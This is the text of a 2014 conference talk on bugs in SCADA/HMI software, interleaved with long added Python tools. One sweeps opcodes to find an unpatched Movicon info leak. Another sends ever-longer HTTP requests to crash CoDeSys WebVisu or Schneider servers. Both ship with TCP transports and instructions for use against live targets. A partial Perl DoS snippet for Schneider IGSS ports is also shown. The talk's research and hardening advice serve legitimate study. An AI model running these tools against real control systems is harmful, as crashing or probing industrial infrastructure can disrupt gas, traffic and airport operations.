This talk is about SCADA vulnerabilities and their exploitation. We will answer some specific questions about SCADA software vulnerabilities with technical details.
The questions are:
- Why are SCADA applications buggy?
- What is the status and impact of the threat?
- How do researchers or hackers discover these vulnerabilities?
In this talk we will also look at some SCADA vulnerabilities that affect well-known SCADA/HMI vendors, and will show how easy it is to hunt these vulnerabilities via reverse engineering, fuzzing, etc.
Celil UNUVER
Celil Unuver is co-founder and security researcher of SignalSEC Ltd. He is also the founder of the NOPcon Security Conference. His areas of expertise include Vulnerability Research & Discovery, Exploit Development, Penetration Testing and Reverse Engineering. He has been a speaker at CONFidence, Swiss Cyber Storm, c0c0n, IstSec and the Kuwait Info Security Forum. He enjoys hunting bugs and has discovered critical vulnerabilities affecting well-known vendors such as Adobe, IBM, Microsoft, Novell etc.
SCADA Software or Swiss Cheese Software? by Celil UNUVER
1. SCADA Software or Swiss Cheese Software?
Code Blue 2014, Tokyo
Celil ÜNÜVER, SignalSEC Ltd.
2. Agenda
• About me
• How it started?
• Why are SCADA apps so BUGGY?
• Hunting SCADA vulnerabilities
• Analysis of the vulnerabilities
3. About me
• Co-founder and Researcher @ SignalSEC Ltd.
• Organizer of NOPcon Hacker Conference (Istanbul, Turkey)
• Interested in vulnerability research, reversing
• Hunted a lot of bugs affecting Adobe, IBM, Microsoft, Facebook, Novell, SCADA vendors etc.
• Has been a speaker at CONFidence, Swiss Cyber Storm, c0c0n etc.
4. How it started?
• SCADA systems have been part of our daily life for many years!
• There was not much interest in SCADA security
5. Milestone
• Stuxnet and Duqu attacks in 2010 – 2011
• SCADA systems got the attention of hackers and researchers after these attacks.
• Critical systems, fame, profit etc.
• They are all JUICY targets
• Lots of SCADA systems are open to the INTERNET
8. ICS Vulnerabilities
• Hardware/Firmware Vulnerabilities: vulns in PLC & RTU devices
• Software Vulnerabilities: vulns in control system software (HMI), but these also affect PLC/RTU devices
9. TWO DOZEN BUGS IN A FEW HOURS
10. Trust me, it's easy!
Actually, it's really easy to hunt SCADA BUGS!!!
11. Why is it easy?
There wasn't a real threat to SCADA software until 2010, so the developers were not aware of SECURE development.
13. Hunting Vulnerabilities
"You must understand that there is more than one path to the top of the mountain."
- Miyamoto Musashi -
14. Case-1: CoDeSys Gateway Vuln
• CoDeSys is a development environment for industrial control systems used by lots of manufacturers.
• Aaron Portnoy from Exodus discovered these vulnerabilities.
• Status: Patched
22. Case-1: Recommendation
• Actually, the file remove / upload bugs are a 'feature' of this application ☺
• But there is no authentication for these operations. Somebody can reverse the packet structure and use these features for evil!
• To solve this kind of bug, developers should add an "authentication" step before executing opcodes.
• Patched in 2013
23. An Interesting Story: Progea MOVICON Vulnerability – still 0day
"When a patch doesn't patch anything!"
• 23 Nov 2013: I discovered some vulnerabilities in the latest version of the Progea MOVICON HMI software
• 24 Nov 2013: We published a short analysis on Pastebin
• 3 Dec 2013: ICS-CERT contacted us about the post on Pastebin. They asked for details, we sent information etc.
24. An Interesting Story: Progea MOVICON Vulnerability – 0day
• 5 Dec 2013:
• from ICS-CERT to me;
25. An Interesting Story: Progea MOVICON Vulnerability – 0day
• THEY SAY: The bugs you discovered are SIMILAR to a bunch of OLDER BUGS that were PATCHED IN 2011.
• ICSA-11-056;
• My findings look exactly the same!!!! But I am able to reproduce them on the latest version!!
26. An Interesting Story: Progea MOVICON Vulnerability – 0day
• These bugs are similar to the bugs that we analyzed in Case-1: CoDeSys
• There is NO authentication to call some functions / operations in the software. Somebody can reverse the packet structure and use these features for evil!
• After a conversation with Code Blue staff, we have decided to mask some details of this zero-day vulnerability.
29. An Interesting Story: Progea MOVICON Vulnerability – 0day
• Opcode [-censored-] calls the GetVersionExA API and sends the output to the client
30. An Interesting Story: Progea MOVICON Vulnerability – 0day
• Here is a simple PoC for this bug;
31. An Interesting Story: Progea MOVICON Vulnerability – 0day
• When we run it and call opcode [-censored-]:
• The 6th byte in the printed data is "dwMajorVersion", which is a return value of GetVersionExA and gives information about the OS.
• Status: PATCHED(!) in 2011, but we are able to exploit it in 2014!
32. An Interesting Story: Progea MOVICON Vulnerability – 0day
• So what is the problem? Why are old bugs still there!?
• After comparing the older version and the latest version, I understood that the vendor actually didn't patch anything.
• Instead of fixing the vulnerabilities, they just changed the "opcodes" of the functions in the new version!
• Older version: opcode 7 causes an info disclosure vulnerability by calling the GetVersionEx API
• New version: they just changed opcode "7" to "X" for calling the GetVersionEx API
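The following is an added example (not code from the talk or from Progea) showing why renumbering an opcode is not a fix: a hunter sweeps all 256 one-byte opcodes and recognises the leak by the shape of the reply, not by the opcode number. The simulated server, its framing (one status byte followed by the raw OSVERSIONINFOA structure), the opcode values 7 and 0x2B and the Windows 7 version data are assumptions for the example; the real Movicon protocol is not reproduced here.

```python
import socket
import struct

# sizeof(OSVERSIONINFOA) and sizeof(OSVERSIONINFOEXA) as GetVersionExA fills them in
OSVERSIONINFOA_SIZE = 148
OSVERSIONINFOEXA_SIZE = 156


def build_osversioninfoa(major, minor, build, csd):
    """Constructed little-endian OSVERSIONINFOA: 5 DWORDs + CHAR szCSDVersion[128]."""
    csd_field = csd.encode("ascii")[:127].ljust(128, b"\x00")
    return struct.pack("<5I", OSVERSIONINFOA_SIZE, major, minor, build, 2) + csd_field


class SimulatedHmiServer:
    """Stand-in for the vulnerable service (assumed framing: one status byte, then
    the raw structure). version_opcode=7 models the old build; any other value
    models the 'patched' build that only renumbered the opcode."""

    def __init__(self, version_opcode):
        self.version_opcode = version_opcode

    def handle(self, packet):
        if packet and packet[0] == self.version_opcode:
            return b"\x00" + build_osversioninfoa(6, 1, 7601, "Service Pack 1")
        return b"\x01"  # generic reply for every other opcode


def find_osversioninfo(data, max_prefix=8):
    """Locate an OSVERSIONINFO[EX]A structure within the first max_prefix bytes of
    a reply. Returns (offset, major, minor, build) or None. Matching on the
    structure itself is what makes the check survive an opcode renumbering."""
    for off in range(min(max_prefix, len(data)) + 1):
        if len(data) - off < 20:
            break
        size, major, minor, build, platform = struct.unpack_from("<5I", data, off)
        if (size in (OSVERSIONINFOA_SIZE, OSVERSIONINFOEXA_SIZE)
                and platform in (1, 2)          # VER_PLATFORM_WIN32_WINDOWS / _NT
                and 3 <= major <= 10
                and len(data) - off >= size):
            return off, major, minor, build
    return None


def sweep_opcodes(send):
    """Try every one-byte opcode; send(packet) -> reply bytes. Returns
    {opcode: (major, minor, build)} for each reply carrying an OS version."""
    leaks = {}
    for op in range(256):
        hit = find_osversioninfo(send(bytes([op])))
        if hit:
            leaks[op] = hit[1:]
    return leaks


def tcp_send(host, port, packet, timeout=3.0):
    """Transport for a real target (e.g. TCP 10651 from the talk): one connection per probe."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(packet)
        return s.recv(4096)


if __name__ == "__main__":
    for label, server in (("old build", SimulatedHmiServer(7)),
                          ("renumbered build", SimulatedHmiServer(0x2B))):
        print(label, sweep_opcodes(server.handle))
```

Against a live target, replace `server.handle` with `lambda p: tcp_send(host, 10651, p)`; the sweep finds the new opcode in well under a minute, which is exactly how long the vendor's "patch" buys.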
34. Temporary solution
• Block remote connections to TCP:10651
• If you contact me personally, I can share vulnerability signatures that you can use in your IDS/IPS (Snort etc.)
35. Case-3: CoDeSys WebVisu
• CoDeSys WebVisu uses a webserver which is usually open to the Internet for visualization of the PLC
• Discovered by me
• Status: Patched
36. Case-3: CoDeSys Vulnerability
• Buffer overflow vulnerability when parsing long HTTP requests due to an unsafe function.
• It uses "vsprintf" to print which file is requested.
37. Case-4: Schneider IGSS Vulnerability
• Gas Distribution in Europe
• Airport in Asia
• Traffic Control Center in Europe
38. Case-4: Schneider IGSS Vulnerability
• Discovered by me
• Status: Patched
• IGSS listens on ports 12399 and 12397 at runtime
• A simple bunch of code causes a DoS:

    use strict;
    use warnings;
    use IO::Socket;

    my $host   = "localhost";
    my $port   = 12399;                 # IGSS runtime ports from the slide
    my $port2  = 12397;
    my $first  = "\x01\x01\x00\x00";    # 4-byte payloads (the backslashes were lost in extraction)
    my $second = "\x02\x01\x00\x00";
    # The slide shows only this setup; the send loop that follows is not on the page.
39. Case-5: Schneider Electric Accutech Heap Overflow Vulnerability
Buffer overflow vulnerability when parsing long HTTP requests due to an unsafe function
Status: Patched
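Case-3 and Case-5 are the same bug class (a long HTTP request path formatted into a fixed buffer), and the way both are found is a length sweep. The block below is an added example, not code from the talk, CoDeSys or Schneider: it generates requests of growing path length, reports the first one that kills the target, then bisects to the smallest crashing length. The simulated server and its 1024-byte buffer are assumptions for the example; the real buffer sizes are not on the page.

```python
import socket


def build_request(path_len, host="target"):
    """GET request whose path is path_len filler bytes; the path is what the
    server formats into its fixed buffer."""
    return (b"GET /" + b"A" * path_len + b" HTTP/1.0\r\n"
            + b"Host: " + host.encode() + b"\r\n\r\n")


class SimulatedWebServer:
    """Stand-in for a server that vsprintf()s the request path into a fixed
    buffer. BUFFER is an assumed size for the example, not a vendor's real
    value. Once overflowed the process is gone: every later connection is refused."""
    BUFFER = 1024

    def __init__(self):
        self.crashed = False

    def send(self, request):
        if self.crashed:
            raise ConnectionRefusedError("target is down")
        path = request.split(b"\r\n", 1)[0].split(b" ")[1]
        if len(path) > self.BUFFER:
            self.crashed = True
            raise ConnectionResetError("target crashed while handling request")
        return b"HTTP/1.0 404 Not Found\r\n\r\n"


def length_sweep(send, lengths):
    """Send requests of increasing path length; send(request) -> reply bytes, or
    raises OSError when the target stops answering. Returns the first length
    that killed the target, or None if every length was survived."""
    for n in lengths:
        try:
            send(build_request(n))
        except OSError:
            return n
    return None


def minimal_crashing_length(make_send, lo, hi):
    """Bisect between lo (known to survive) and hi (known to crash). make_send()
    must return a transport to a freshly restarted target: a crashed service
    rejects every later probe and would otherwise fake a hit."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        try:
            make_send()(build_request(mid))
            lo = mid
        except OSError:
            hi = mid
    return hi


def tcp_send(host, port, request, timeout=3.0):
    """Transport for a real target; socket timeouts and connection errors are OSErrors."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        return s.recv(4096)


if __name__ == "__main__":
    target = SimulatedWebServer()
    first = length_sweep(target.send, [64, 256, 512, 1024, 2048, 4096])
    print("first crashing length:", first)
    print("minimal crashing length:",
          minimal_crashing_length(lambda: SimulatedWebServer().send, 512, first))
```

Against a real WebVisu or Accutech instance the transport is `lambda r: tcp_send(host, port, r)`; attach a debugger to the service before the sweep so the crashing request is caught at the `vsprintf` call rather than only observed as a dead socket.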
43. Case-6: Invensys Wonderware System Platform Vulnerability
• Discovered by me
• Status: Patched
• Killing five birds with one stone ☺
44. Case-6: Invensys Wonderware System Platform Vulnerability
• An ActiveX Buffer Overflow vulnerability
• Just found by ActiveX fuzzing...
• Send the exploit URL to the HMI operator
• Click and pwn!
46. Case-7: InduSoft HMI Bugs
• This is really creepy!
• This software doesn't even check any "magic" value of incoming packets. There is no custom packet structure!
• Sending 1 byte to TCP:4322 is enough to jump into a switch case
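Case-1's recommendation, the Movicon case and Case-7 describe the same missing checks from three angles: no framing (one byte reaches the opcode switch), and no authentication before privileged opcodes such as file upload and delete. The block below is an added example, not code from the talk or from any of the vendors: a dispatcher with the bug pattern beside one that validates the frame and refuses privileged opcodes until the session has answered a challenge. The framing (magic, 16-bit length, opcode), the opcode numbers and the HMAC-over-nonce login are assumptions for the example, not any vendor's real protocol.

```python
import hmac
import os
import struct

# Assumed framing for this example only: MAGIC | u16 length | opcode | body
MAGIC = b"\xab\xcd"
OP_LOGIN, OP_GET_FILE, OP_PUT_FILE, OP_DEL_FILE = 0x01, 0x02, 0x03, 0x04
PRIVILEGED = {OP_GET_FILE, OP_PUT_FILE, OP_DEL_FILE}


def frame(op, body=b""):
    """Build a well-formed packet; the length field covers opcode + body."""
    return MAGIC + struct.pack("<H", 1 + len(body)) + bytes([op]) + body


class VulnerableDispatcher:
    """The pattern from the talk: the first byte goes straight into the opcode
    switch, so any client on the network can upload or delete project files."""

    def __init__(self, files):
        self.files = dict(files)

    def handle(self, pkt):
        if not pkt:
            return b""
        op = pkt[0]                       # no magic, no length, no auth
        name, _, data = pkt[1:].partition(b"\x00")
        if op == OP_DEL_FILE:
            self.files.pop(name.decode(), None)
            return b"OK"
        if op == OP_PUT_FILE:
            self.files[name.decode()] = data
            return b"OK"
        if op == OP_GET_FILE:
            return self.files.get(name.decode(), b"")
        return b"ERR unknown opcode"


class HardenedDispatcher:
    """Same feature set, but frames are validated and privileged opcodes are
    refused until the session proves knowledge of a shared secret."""

    def __init__(self, files, secret):
        self.files = dict(files)
        self._key = secret.encode()
        self.nonce = os.urandom(16)       # per-session challenge, sent to the client at connect
        self.authenticated = False

    def handle(self, pkt):
        if len(pkt) < 5 or pkt[:2] != MAGIC:
            return b"ERR bad magic"
        (length,) = struct.unpack_from("<H", pkt, 2)
        if length != len(pkt) - 4:
            return b"ERR bad length"
        op, body = pkt[4], pkt[5:]
        if op == OP_LOGIN:
            expected = hmac.new(self._key, self.nonce, "sha256").digest()
            self.authenticated = hmac.compare_digest(body, expected)
            return b"OK" if self.authenticated else b"ERR auth failed"
        if op in PRIVILEGED and not self.authenticated:
            return b"ERR auth required"   # the step the talk asks vendors to add
        name, _, data = body.partition(b"\x00")
        if op == OP_DEL_FILE:
            self.files.pop(name.decode(), None)
            return b"OK"
        if op == OP_PUT_FILE:
            self.files[name.decode()] = data
            return b"OK"
        if op == OP_GET_FILE:
            return self.files.get(name.decode(), b"")
        return b"ERR unknown opcode"


def login_packet(secret, nonce):
    """Client side of OP_LOGIN: HMAC-SHA256 over the server's session nonce."""
    return frame(OP_LOGIN, hmac.new(secret.encode(), nonce, "sha256").digest())
```

The hardened version still exposes the same file operations (they are a feature, as the talk says); what changes is that the operation is bound to a session that has authenticated, and the parser rejects anything that is not a frame before it looks at the opcode at all.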
51. Conclusion
• Critical Infrastructures are juicy targets!
• Hacktivists are interested in SCADA hacking too, not only government intelligence agencies.
• Applications are insecure!